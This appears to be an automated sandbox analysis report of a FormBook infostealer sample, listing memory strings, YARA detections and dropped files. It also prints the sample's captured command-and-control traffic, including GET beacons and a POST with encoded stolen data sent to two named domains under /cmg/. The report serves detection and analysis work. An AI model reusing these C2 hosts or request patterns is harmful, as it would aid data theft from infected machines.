            Source: global trafficHTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1Host: www.esanjor.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1Host: www.lifecoachwoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmpString found in binary or memory: <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#"> equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: cdn.onenote.net
            Source: unknownHTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Sep 2020 14:47:03 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: no-cachecontent-language: enx-wix-request-id: 1600699623.782789711115195vary: Accept-EncodingAge: 0X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjTybE2BzSWtM7HTFP9VFEC,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijnEXQ2/68Un6qnh1J4MeNs1WIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI0uHmepHlxDNsmSKhfIbcIJWd3xniMsr1HjrszKGvMzr,2UNV7KOq4oGjA5+PKsX47FDtGCr72w4BMu4v3sd6ZGU=,qquldgcFrj2n046g4RNSVO41WPKnFMbc7ID/2Bjixvw=,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UOYNUEAXqn/WZl+iQhS1dpQ4tYPCIn0xdi8lnDzR9qKl0JDQPGidxH0yAUk8YNY2WIHlCalF7YnfvOr2cMPpyw==,LXlT8qjS5x6WBejJA3+gBV3rMnjOqLl2cZe24jK447KTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,IaDuTAMGGvhXtruM6nHg6saWad6chcA1IdKNJ2oysB5NG+KuK+VIZfbNzHJu0vJu,a3Wp9ZyujRzrXdcjNnttJroCVlUX3HA8CNXa/Wj4FZ9Y2J424u2BB5qsIDUDYaV+I5gzac6Ha/CTe5yTy9BfOQ==Server: Pepyaka/1.19.0Data Raw: 62 64 30 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 Data Ascii: bd0 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_t
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmpString found in binary or memory: http://browsehappy.com/
            Source: CN03716-20.exe, 00000000.00000003.260996277.0000000005E09000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.257621308.0000000005E3D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmpString found in binary or memory: http://i.cdnpark.com/themes/registrar/791105.css
            Source: CN03716-20.exe, 00000000.00000002.290578484.0000000002EA1000.00000004.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.504570205.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comC
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comCon
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comS
            Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comVM
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-uD
            Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comnMD
            Source: CN03716-20.exe, 00000000.00000003.260501632.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comv-s-
            Source: CN03716-20.exe, 00000000.00000003.260757855.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comvMn
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: CN03716-20.exe, 00000000.00000003.263942943.0000000005E33000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: CN03716-20.exe, 00000000.00000003.264788683.0000000005E0C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlS
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
            Source: CN03716-20.exe, 00000000.00000003.266267384.0000000005E33000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersy
            Source: CN03716-20.exe, 00000000.00000003.264319642.0000000005E33000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersz
            Source: CN03716-20.exe, 00000000.00000002.290344600.0000000001537000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comF
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: CN03716-20.exe, 00000000.00000003.257242203.0000000005E3D000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com7
            Source: CN03716-20.exe, 00000000.00000003.257293184.0000000005E3D000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com8
            Source: CN03716-20.exe, 00000000.00000003.257143704.0000000005E3D000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comW
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnBM-
            Source: CN03716-20.exe, 00000000.00000003.259637169.0000000005E0E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnI
            Source: CN03716-20.exe, 00000000.00000003.259751017.0000000005E11000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnS
            Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna-e.
            Source: CN03716-20.exe, 00000000.00000003.259488439.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnn-u
            Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnormN
            Source: CN03716-20.exe, 00000000.00000003.259592411.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-t
            Source: CN03716-20.exe, 00000000.00000003.268205417.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: CN03716-20.exe, 00000000.00000003.271944510.0000000005E0B000.00000004.00000001.sdmp, CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmpString found in binary or memory: http://www.lifecoachwoman.com
            Source: control.exe, 00000010.00000002.529344625.0000000004B29000.00000004.00000001.sdmpString found in binary or memory: http://www.lifecoachwoman.com/cmg/
            Source: CN03716-20.exe, 00000000.00000003.267987189.0000000005E03000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com2
            Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comS
            Source: CN03716-20.exe, 00000000.00000003.256676526.000000000153D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comtM
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: CN03716-20.exe, 00000000.00000003.260108438.0000000005E0C000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com5
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: CN03716-20.exe, 00000000.00000003.260621493.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.co
            Source: CN03716-20.exe, 00000000.00000002.294628357.0000000005EF0000.00000002.00000001.sdmp, CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.319107666.000000000B150000.00000002.00000001.sdmp, srmdufw81bmhwhwh.exe, 0000001A.00000002.508710166.0000000006300000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn(M
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnCo:
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnS
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnbr?
            Source: CN03716-20.exe, 00000000.00000003.260431649.0000000005E07000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnseV
            Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: control.exe, 00000010.00000002.519302835.0000000000498000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Ll
            Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Detected FormBook malwareShow sources
            Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\0K910UP8\0K9logri.iniJump to dropped file
            Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\0K910UP8\0K9logrv.iniJump to dropped file
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
